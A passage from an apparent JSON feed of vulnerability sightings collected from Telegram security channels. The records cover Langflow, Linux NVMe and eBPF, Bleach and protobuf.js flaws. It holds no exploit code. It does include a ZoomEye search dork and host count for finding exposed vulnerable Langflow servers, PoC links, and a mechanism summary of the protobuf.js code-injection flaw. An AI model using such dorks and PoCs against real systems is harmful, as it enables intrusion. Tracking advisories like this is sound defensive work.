\u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f \u0442\u043e\u043b\u044c\u043a\u043e \u043f\u043e\u0441\u043b\u0435 \u043e\u0446\u0435\u043d\u043a\u0438 \u0432\u0441\u0435\u0445 \u0441\u043e\u043f\u0443\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u0445 \u0440\u0438\u0441\u043a\u043e\u0432.\n\n\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0439:\nhttps://github.com/metabase/metabase/security/advisories/GHSA-fppj-vcm3-w229", "creation_timestamp": "2026-04-27T14:44:08.000000Z"}, {"uuid": "26d39d3e-a348-49a1-8e09-0c93a00013d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RVQX-WPFH-MFX7", "type": "published-proof-of-concept", "source": "https://t.me/TheDarkWebInformer/18635", "content": "\ud83d\udea8CVE-2025-3248: RCE vulnerability in Langflow\n\nLink: https://www.zoomeye.ai/searchResult?q=YXBwPSJMYW5nZmxvdyI%3D\n\nZoomEye Dork: app=\"Langflow\"\n\nResults: 1,862\n\nAdvisory: https://github.com/advisories/GHSA-rvqx-wpfh-mfx7\n\nPoC: https://github.com/ynsmroztas/CVE-2025-3248-Langflow-RCE\n\nCVSS: 9.3\n\n\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\n\nFollow @zoomeye_team's official Twitter/X account and send the message \u201cDark Web Informer\u201d via DM to receive an extra 15-day membership. \ud83d\udc99", "creation_timestamp": "2025-06-29T23:19:07.000000Z"}, {"uuid": "f2721254-5924-4546-8688-16fa293d4d88", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0897", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/13261", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-6535\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in the Linux kernel's NVMe driver. This issue may allow an unauthenticated malicious actor to send a set of crafted TCP packages when using NVMe over TCP, leading the NVMe driver to a NULL pointer dereference in the NVMe driver, causing kernel panic and a denial of service.\n\ud83d\udccf Published: 2024-02-07T21:04:21.409Z\n\ud83d\udccf Modified: 2025-04-24T15:58:14.946Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0723\n2. https://access.redhat.com/errata/RHSA-2024:0724\n3. https://access.redhat.com/errata/RHSA-2024:0725\n4. https://access.redhat.com/errata/RHSA-2024:0881\n5. https://access.redhat.com/errata/RHSA-2024:0897\n6. https://access.redhat.com/errata/RHSA-2024:1248\n7. https://access.redhat.com/errata/RHSA-2024:2094\n8. https://access.redhat.com/errata/RHSA-2024:3810\n9. https://access.redhat.com/security/cve/CVE-2023-6535\n10. https://bugzilla.redhat.com/show_bug.cgi?id=2254053", "creation_timestamp": "2025-04-24T16:06:40.000000Z"}, {"uuid": "98d6778d-cadb-4bb7-8e45-ab480f4666ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J87X-J6MH-MV8V", "type": "published-proof-of-concept", "source": "https://t.me/ap_security/138", "content": "\u2604\ufe0fCVE-2023-2163: Linux Kernel eBPF verifier bug\n\n\u041d\u0435\u043a\u043e\u0440\u0440\u0435\u043a\u0442\u043d\u043e\u0435 \u0443\u0434\u0430\u043b\u0435\u043d\u0438\u0435 \u0432\u0435\u0440\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440\u0430 \u0432 BPF \u0432 \u044f\u0434\u0440\u0435 Linux&gt;=5.4 \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442 \u043a \u0442\u043e\u043c\u0443, \u0447\u0442\u043e \u043d\u0435\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u044b\u0435 \u043f\u0443\u0442\u0438 \u043a \u043a\u043e\u0434\u0443 \u043d\u0435\u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u043e \u043f\u043e\u043c\u0435\u0447\u0430\u044e\u0442\u0441\u044f \u043a\u0430\u043a \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u044b\u0435, \u0447\u0442\u043e \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442 \u043a \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u043c\u0443 \u0447\u0442\u0435\u043d\u0438\u044e/\u0437\u0430\u043f\u0438\u0441\u0438 \u0432 \u043f\u0430\u043c\u044f\u0442\u0438 \u044f\u0434\u0440\u0430\ud83d\udd13\n\n\ud83d\udce3\u0421\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 PoC:\nhttps://github.com/google/security-research/security/advisories/GHSA-j87x-j6mh-mv8v\n\n#cve #poc #exploit #linux", "creation_timestamp": "2023-10-18T05:13:30.000000Z"}, {"uuid": "74adfde9-f93b-493b-a1bf-b6c2497e5b65", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0725", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/13261", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-6535\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in the Linux kernel's NVMe driver. This issue may allow an unauthenticated malicious actor to send a set of crafted TCP packages when using NVMe over TCP, leading the NVMe driver to a NULL pointer dereference in the NVMe driver, causing kernel panic and a denial of service.\n\ud83d\udccf Published: 2024-02-07T21:04:21.409Z\n\ud83d\udccf Modified: 2025-04-24T15:58:14.946Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0723\n2. https://access.redhat.com/errata/RHSA-2024:0724\n3. https://access.redhat.com/errata/RHSA-2024:0725\n4. https://access.redhat.com/errata/RHSA-2024:0881\n5. https://access.redhat.com/errata/RHSA-2024:0897\n6. https://access.redhat.com/errata/RHSA-2024:1248\n7. https://access.redhat.com/errata/RHSA-2024:2094\n8. https://access.redhat.com/errata/RHSA-2024:3810\n9. https://access.redhat.com/security/cve/CVE-2023-6535\n10. https://bugzilla.redhat.com/show_bug.cgi?id=2254053", "creation_timestamp": "2025-04-24T16:06:40.000000Z"}, {"uuid": "682e7cd6-ffbd-4228-a10f-9b2f665c1e00", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2CH5-GQJM-8P92", "type": "seen", "source": "Telegram/61p3TvgIcQeITUHd25WC7uXKnalG822tf2zquntb02gfO4o", "content": "", "creation_timestamp": "2025-06-24T03:34:31.000000Z"}, {"uuid": "84d96172-4dbf-4545-8617-70976fe899f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M6XF-FQ7Q-8743", "type": "published-proof-of-concept", "source": "https://t.me/cKure/3837", "content": "\u25a0\u25a0\u25a0\u25a0\u25a0 Third mutation XSS bug patched in Mozilla Bleach library.\n\nhttps://github.com/advisories/GHSA-m6xf-fq7q-8743\n\nhttps://portswigger.net/daily-swig/third-mutation-xss-bug-patched-in-mozilla-bleach-library", "creation_timestamp": "2021-02-04T13:12:32.000000Z"}, {"uuid": "0590a235-4d19-455d-ba58-a5de833a8292", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X8MP-CHX3-6X2P", "type": "published-proof-of-concept", "source": "Telegram/AvRPE1FYyApk1Jln3Af0piOZ09oDjaUbhCE1oirCL83hBqc", "content": "", "creation_timestamp": "2025-06-09T13:02:03.000000Z"}, {"uuid": "b1a0f3ad-7023-4e08-b038-37dd7120ea7e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3Q5Q-QMRM-RVWX", "type": "published-proof-of-concept", "source": "Telegram/AvRPE1FYyApk1Jln3Af0piOZ09oDjaUbhCE1oirCL83hBqc", "content": "", "creation_timestamp": "2025-06-09T13:02:03.000000Z"}, {"uuid": "5af8ecff-3c9f-4485-8775-9417b5eeda3b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CM93-6M2M-CJCV", "type": "published-proof-of-concept", "source": "Telegram/wBaWWziweQgkSo7_QapMU6ZNqlsB8QnkMAlvPkvlPpTVY_k", "content": "", "creation_timestamp": "2025-06-09T14:01:05.000000Z"}, {"uuid": "ee14d97e-319d-494b-bfb5-ba7930422b51", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QVJC-6XV7-6V5F", "type": "published-proof-of-concept", "source": "Telegram/wBaWWziweQgkSo7_QapMU6ZNqlsB8QnkMAlvPkvlPpTVY_k", "content": "", "creation_timestamp": "2025-06-09T14:01:05.000000Z"}, {"uuid": "5809c52f-f06e-4d6f-84c2-1840ad16572d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M6R3-C73X-8FW5", "type": "published-proof-of-concept", "source": "Telegram/wBaWWziweQgkSo7_QapMU6ZNqlsB8QnkMAlvPkvlPpTVY_k", "content": "", "creation_timestamp": "2025-06-09T14:01:05.000000Z"}, {"uuid": "9ca9483a-cd85-4e6e-aab4-fd4e93bcb226", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GR67-PWCV-76GF", "type": "published-proof-of-concept", "source": "Telegram/Cx1-p36APBve2ZXOx6JZQ1ihep0qwdXJ_nQmLSJI9jXODK8", "content": "", "creation_timestamp": "2025-06-10T16:01:27.000000Z"}, {"uuid": "9782b933-6e95-413a-b99a-0d557032136b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XQ3M-2V4X-88GG", "type": "published-proof-of-concept", "source": "https://t.me/true_secator/8120", "content": "\u0412\u044b\u0448\u0435\u043b PoC \u0434\u043b\u044f \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 RCE-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 protobuf.js, \u0448\u0438\u0440\u043e\u043a\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u043e\u0439 \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0430 Protocol Buffers \u043e\u0442 Google \u043d\u0430 JavaScript.\n\n\u0418\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442 \u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u043e\u0433\u0440\u043e\u043c\u043d\u043e\u0439 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u043e\u0441\u0442\u044c\u044e \u0432 \u0440\u0435\u0435\u0441\u0442\u0440\u0435 Node Package Manager (npm), \u0435\u0433\u043e\u00a0\u0441\u043a\u0430\u0447\u0438\u0432\u0430\u044e\u0442 \u0432 \u0441\u0440\u0435\u0434\u043d\u0435\u043c \u043e\u043a\u043e\u043b\u043e 50 \u043c\u043b\u043d. \u0440\u0430\u0437 \u0432 \u043d\u0435\u0434\u0435\u043b\u044e.\n\n\u0417\u0430\u0434\u0435\u0439\u0441\u0442\u0432\u0443\u0435\u0442\u0441\u044f \u0434\u043b\u044f \u043c\u0435\u0436\u0441\u0435\u0440\u0432\u0438\u0441\u043d\u043e\u0433\u043e \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f, \u0432 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f\u0445 \u0440\u0435\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0432\u0440\u0435\u043c\u0435\u043d\u0438, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0434\u043b\u044f \u044d\u0444\u0444\u0435\u043a\u0442\u0438\u0432\u043d\u043e\u0433\u043e \u0445\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445 \u0432 \u0431\u0430\u0437\u0430\u0445 \u0434\u0430\u043d\u043d\u044b\u0445 \u0438 \u043e\u0431\u043b\u0430\u0447\u043d\u044b\u0445 \u0441\u0440\u0435\u0434\u0430\u0445.\n\n\u0412 \u043e\u0442\u0447\u0435\u0442\u0435 Endor Labs \u043e\u0442\u043c\u0435\u0447\u0435\u043d\u043e, \u0447\u0442\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430 \u0432 protobuf.js \u0432\u044b\u0437\u0432\u0430\u043d\u0430 \u043d\u0435\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0439 \u0433\u0435\u043d\u0435\u0440\u0430\u0446\u0438\u0435\u0439 \u0434\u0438\u043d\u0430\u043c\u0438\u0447\u0435\u0441\u043a\u043e\u0433\u043e \u043a\u043e\u0434\u0430. \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043f\u043e\u043a\u0430 \u043d\u0435 \u043f\u0440\u0438\u0441\u0432\u043e\u0435\u043d CVE, \u0438 \u0432 \u043d\u0430\u0441\u0442\u043e\u044f\u0449\u0435\u0435 \u0432\u0440\u0435\u043c\u044f \u043e\u043d\u0430 \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u043a\u0430\u043a GHSA-xq3m-2v4x-88gg (\u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440, \u043f\u0440\u0438\u0441\u0432\u043e\u0435\u043d\u043d\u044b\u0439 GitHub).\n\n\u041a\u0430\u043a \u043f\u043e\u044f\u0441\u043d\u044f\u0435\u0442 Endor Labs, \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0430 \u0441\u043e\u0437\u0434\u0430\u0435\u0442 \u0444\u0443\u043d\u043a\u0446\u0438\u0438 JavaScript \u0438\u0437 \u0441\u0445\u0435\u043c protobuf \u043f\u0443\u0442\u0435\u043c \u043a\u043e\u043d\u043a\u0430\u0442\u0435\u043d\u0430\u0446\u0438\u0438 \u0441\u0442\u0440\u043e\u043a \u0438 \u0438\u0445 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u0447\u0435\u0440\u0435\u0437 \u043a\u043e\u043d\u0441\u0442\u0440\u0443\u043a\u0442\u043e\u0440 Function(), \u043d\u043e \u043e\u043d\u0430 \u043d\u0435 \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0435\u0442 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440\u044b, \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u044b\u0435 \u0438\u0437 \u0441\u0445\u0435\u043c, \u0442\u0430\u043a\u0438\u0435 \u043a\u0430\u043a \u0438\u043c\u0435\u043d\u0430 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u0439.\n\n\u042d\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u0438\u0442\u044c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u0443\u044e \u0441\u0445\u0435\u043c\u0443, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0432\u043d\u0435\u0434\u0440\u044f\u0435\u0442 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434 \u0432 \u0441\u0433\u0435\u043d\u0435\u0440\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u0443\u044e \u0444\u0443\u043d\u043a\u0446\u0438\u044e, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0437\u0430\u0442\u0435\u043c \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442\u0441\u044f, \u043a\u043e\u0433\u0434\u0430 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0435 \u043e\u0431\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u0435\u0442 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u0435, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f \u044d\u0442\u0443 \u0441\u0445\u0435\u043c\u0443.\n\n\u0427\u0442\u043e \u043e\u0442\u043a\u0440\u044b\u0432\u0430\u0435\u0442 \u043f\u0443\u0442\u044c \u043a RCE \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0430\u0445 \u0438\u043b\u0438 \u0432 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f\u0445, \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u044e\u0449\u0438\u0445 \u0441\u0445\u0435\u043c\u044b, \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u044b\u0435 \u043f\u043e\u0434 \u0432\u043b\u0438\u044f\u043d\u0438\u0435\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430, \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u044f \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u043f\u0435\u0440\u0435\u043c\u0435\u043d\u043d\u044b\u043c \u0441\u0440\u0435\u0434\u044b, \u0443\u0447\u0435\u0442\u043d\u044b\u043c \u0434\u0430\u043d\u043d\u044b\u043c, \u0431\u0430\u0437\u0430\u043c \u0434\u0430\u043d\u043d\u044b\u0445 \u0438 \u0432\u043d\u0443\u0442\u0440\u0435\u043d\u043d\u0438\u043c \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u043c, \u0438 \u0434\u0430\u0436\u0435 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044f \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043b\u044f\u0442\u044c \u0433\u043e\u0440\u0438\u0437\u043e\u043d\u0442\u0430\u043b\u044c\u043d\u043e\u0435 \u043f\u0435\u0440\u0435\u043c\u0435\u0449\u0435\u043d\u0438\u0435 \u0432\u043d\u0443\u0442\u0440\u0438 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b.\n\n\u0410\u0442\u0430\u043a\u0430 \u0442\u0430\u043a\u0436\u0435 \u043c\u043e\u0436\u0435\u0442 \u0437\u0430\u0442\u0440\u043e\u043d\u0443\u0442\u044c \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u044b \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u043e\u0432, \u0435\u0441\u043b\u0438 \u043e\u043d\u0438 \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u044e\u0442 \u0438 \u0434\u0435\u043a\u043e\u0434\u0438\u0440\u0443\u044e\u0442 \u043d\u0435\u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0435 \u0441\u0445\u0435\u043c\u044b \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e. \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 protobuf.js 8.0.0/7.5.4 \u0438 \u043d\u0438\u0436\u0435. Endor Labs \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442 \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u044c\u0441\u044f \u0434\u043e \u0432\u0435\u0440\u0441\u0438\u0439 8.0.1 \u0438 7.5.5, \u0432 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u044d\u0442\u0430 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0430.\n\n\u041f\u0430\u0442\u0447 \u043e\u0447\u0438\u0449\u0430\u0435\u0442 \u0438\u043c\u0435\u043d\u0430 \u0442\u0438\u043f\u043e\u0432, \u0443\u0434\u0430\u043b\u044f\u044f \u043d\u0435\u0431\u0443\u043a\u0432\u0435\u043d\u043d\u043e-\u0446\u0438\u0444\u0440\u043e\u0432\u044b\u0435 \u0441\u0438\u043c\u0432\u043e\u043b\u044b, \u0447\u0442\u043e \u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0449\u0430\u0435\u0442 \u0437\u0430\u043a\u0440\u044b\u0442\u0438\u0435 \u0441\u0438\u043d\u0442\u0435\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0444\u0443\u043d\u043a\u0446\u0438\u0438 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u043c. \n\n\u041e\u0434\u043d\u0430\u043a\u043e Endor Labs \u043e\u0442\u043c\u0435\u0447\u0430\u0435\u0442, \u0447\u0442\u043e \u0431\u043e\u043b\u0435\u0435 \u0434\u043e\u043b\u0433\u043e\u0441\u0440\u043e\u0447\u043d\u044b\u043c \u0440\u0435\u0448\u0435\u043d\u0438\u0435\u043c \u0431\u044b\u043b\u043e \u0431\u044b \u043f\u043e\u043b\u043d\u043e\u0441\u0442\u044c\u044e \u043f\u0440\u0435\u043a\u0440\u0430\u0442\u0438\u0442\u044c \u043f\u0435\u0440\u0435\u0434\u0430\u0447\u0443 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0445 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440\u043e\u0432 \u0447\u0435\u0440\u0435\u0437 Function.\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0430\u044e\u0442, \u0447\u0442\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0434\u043e\u0432\u043e\u043b\u044c\u043d\u043e \u043e\u0447\u0435\u0432\u0438\u0434\u043d\u0430, \u0438 \u0447\u0442\u043e \u043c\u0438\u043d\u0438\u043c\u0430\u043b\u044c\u043d\u044b\u0439 PoC, \u043a\u0430\u043a \u043e\u0442\u043c\u0435\u0447\u0435\u043d\u043e \u0432 \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u0438 \u044d\u0442\u043e \u043f\u043e\u043b\u043d\u043e\u0441\u0442\u044c\u044e \u043f\u043e\u0434\u0442\u0432\u0435\u0440\u0436\u0434\u0430\u0435\u0442. \u041e\u0434\u043d\u0430\u043a\u043e \u043d\u0430 \u0441\u0435\u0433\u043e\u0434\u043d\u044f\u0448\u043d\u0438\u0439 \u0434\u0435\u043d\u044c \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0445 \u0443\u0441\u043b\u043e\u0432\u0438\u044f\u0445 \u043d\u0435 \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u043b\u043e\u0441\u044c.\n\n\u041e\u0431 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0441\u043e\u043e\u0431\u0449\u0438\u043b \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c Endor Labs \u041a\u0440\u0438\u0441\u0442\u0438\u0430\u043d \u0421\u0442\u0430\u0439\u043a\u0443\u00a02 \u043c\u0430\u0440\u0442\u0430, \u0430 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438 \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0438 \u043f\u0430\u0442\u0447 \u043d\u0430 GitHub 11 \u043c\u0430\u0440\u0442\u0430. \u0418\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u043b\u044f \u043f\u0430\u043a\u0435\u0442\u043e\u0432 npm \u0441\u0442\u0430\u043b\u0438 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b 4 \u0430\u043f\u0440\u0435\u043b\u044f \u0434\u043b\u044f \u0432\u0435\u0442\u043a\u0438 8.x \u0438 15 \u0430\u043f\u0440\u0435\u043b\u044f \u0434\u043b\u044f \u0432\u0435\u0442\u043a\u0438 7.x.\n\n\u041f\u043e\u043c\u0438\u043c\u043e \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u043e \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0445 \u0432\u0435\u0440\u0441\u0438\u0439, Endor Labs \u0442\u0430\u043a\u0436\u0435 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442 \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0442\u044c \u0442\u0440\u0430\u043d\u0437\u0438\u0442\u0438\u0432\u043d\u044b\u0435 \u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e\u0441\u0442\u0438, \u0440\u0430\u0441\u0441\u043c\u0430\u0442\u0440\u0438\u0432\u0430\u0442\u044c \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0443 \u0441\u0445\u0435\u043c \u043a\u0430\u043a \u043d\u0435\u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0432\u0432\u043e\u0434 \u0438 \u043e\u0442\u0434\u0430\u0432\u0430\u0442\u044c \u043f\u0440\u0435\u0434\u043f\u043e\u0447\u0442\u0435\u043d\u0438\u0435 \u043f\u0440\u0435\u0434\u0432\u0430\u0440\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0441\u043a\u043e\u043c\u043f\u0438\u043b\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c/\u0441\u0442\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u043c \u0441\u0445\u0435\u043c\u0430\u043c \u0432 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0439 \u0441\u0440\u0435\u0434\u0435.", "creation_timestamp": "2026-04-20T14:23:26.000000Z"}, {"uuid": "3db84d5a-159d-4c5a-bd7a-71b81a15bfba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-52P5-5FMW-9HRF", "type": "published-proof-of-concept", "source": "Telegram/46ceI5nsxcRHJRwxF0BC6VxuGD8BgaFNIkSgqW-NagPBDfM", "content": "", "creation_timestamp": "2025-06-19T05:01:47.000000Z"}, {"uuid": "0b59af66-67e2-42b5-ac63-020a9b204f06", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RWVH-2GFH-WMCM", "type": "published-proof-of-concept", "source": "Telegram/46ceI5nsxcRHJRwxF0BC6VxuGD8BgaFNIkSgqW-NagPBDfM", "content": "", "creation_timestamp": "2025-06-19T05:01:47.000000Z"}, {"uuid": "051dbff6-0453-466e-a1b9-b93333c90703", "vulnerability_lookup_origin": 